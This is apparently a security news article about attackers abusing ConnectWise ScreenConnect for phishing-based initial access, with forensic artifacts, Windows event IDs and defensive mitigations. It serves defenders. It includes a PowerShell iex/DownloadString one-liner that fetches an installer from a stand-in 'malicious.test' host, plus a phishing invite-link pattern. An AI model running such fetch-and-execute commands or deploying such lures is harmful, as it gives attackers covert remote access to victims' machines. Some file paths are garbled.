A recent surge in threat actors leveraging remote management and monitoring (RMM) tools for initial access has intensified scrutiny of platforms once reserved for legitimate IT administration.
While AnyDesk has waned in popularity among adversaries due to improved detection, ConnectWise ScreenConnect has emerged as a preferred option for stealthy intrusion, persistence, and lateral movement.
This investigation examines how malicious actors exploit ScreenConnect’s features, installer artifacts, and communication channels to silently compromise endpoints.
Rise of RMM Abuse
RMM solutions offer unattended control, scripting capabilities, file transfer, and session logging—features attractive to both system administrators and cybercriminals.
Attackers craft phishing lures that direct victims to custom ScreenConnect installers or invite links generated through the management console.
By hosting a phishing page that masquerades as a trusted support portal, threat actors drop an .msi installer that executes primarily in memory, leaving minimal on-disk traces.
For example, a simple PowerShell one-liner can install the ScreenConnect agent without writing the full payload to disk:
powershelliex (New-Object Net.WebClient).DownloadString('https://malicious.test/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest')
Once executed, the agent registers itself as a Windows service, providing attackers with persistent remote access under the guise of legitimate IT maintenance.
Inside ScreenConnect Exploitation
ScreenConnect capabilities span Windows, macOS, Linux, iOS, and Android, enabling cross-platform control. After the initial .msi installer (commonly named ScreenConnect.ClientSetup.msiCopy) is launched from a temporary directory—such asC:UsersKh4lifaAppDataLocalTempScreenConnect—the agent drops a client binary at:C:Program Files (x86)ScreenConnect Client (.
This executable loads configuration settings from user.config and system.config XML files in the system profile’s AppData folder, mapping custom access URLs to IPs and encrypted launch keys.
Because chat logs and session data reside in memory, only memory acquisition reveals the full scope of attacker interactions, unlike AnyDesk which persists logs on disk.
Attackers leverage the console’s Build+ option to generate custom installers or invite links that guide victims through staged deployment.
A generic invite URL—https://kh4lifa.test.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest—can be embedded in phishing emails or SMS.
The builder and invite links can be generated directly from the console, adversaries gain a flexible phishing surface.
During post-deployment, Event ID 4573 signals a new remote access session, followed by Application Log events 100 and 101 documenting session start and end. File transfers create a folder under the victim’s Documents directory, such as:
textC:UsersKh4lifaDocumentsConnectWiseControlFiles
with Event 201 marking outbound transfers. No corresponding events are generated for inbound transfers, further complicating forensic analysis.
Mitigations
Defenders should treat the ScreenConnect agent binary and its XML configuration files as primary artifacts for detection. Monitoring for unexpected MSI executions in Temp directories and services named ScreenConnect.WindowsClient.exe can flag illicit installations.
ScreenConnect.WindowsClientOrganizations can reduce risk by limiting RMM console access, enforcing multifactor authentication, rotating API keys, and restricting custom builder generation to vetted personnel.
Collecting memory snapshots is crucial to recover in-memory chat logs and transient keys. Incident response teams must also validate DNS resolutions and IP addresses found in user.config, as malicious domains often host command-and-control infrastructure.
Email gateways and web proxies should block known invite link patterns and scan downloads for .msi packages that deviate from approved corporate installers.
Integrating detection rules for Event IDs 4573, 100, and 101 into SIEM platforms will enable real-time alerts on suspicious remote sessions.
As threat actors continue to weaponize legitimate IT tools, ScreenConnect abuse underscores the need for a layered defense strategy that combines endpoint monitoring, network anomaly detection, and proactive threat hunting focused on RMM platforms.
By understanding attacker techniques and key indicators of compromise, security teams can detect and thwart unauthorized access before it escalates into a full-scale breach.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
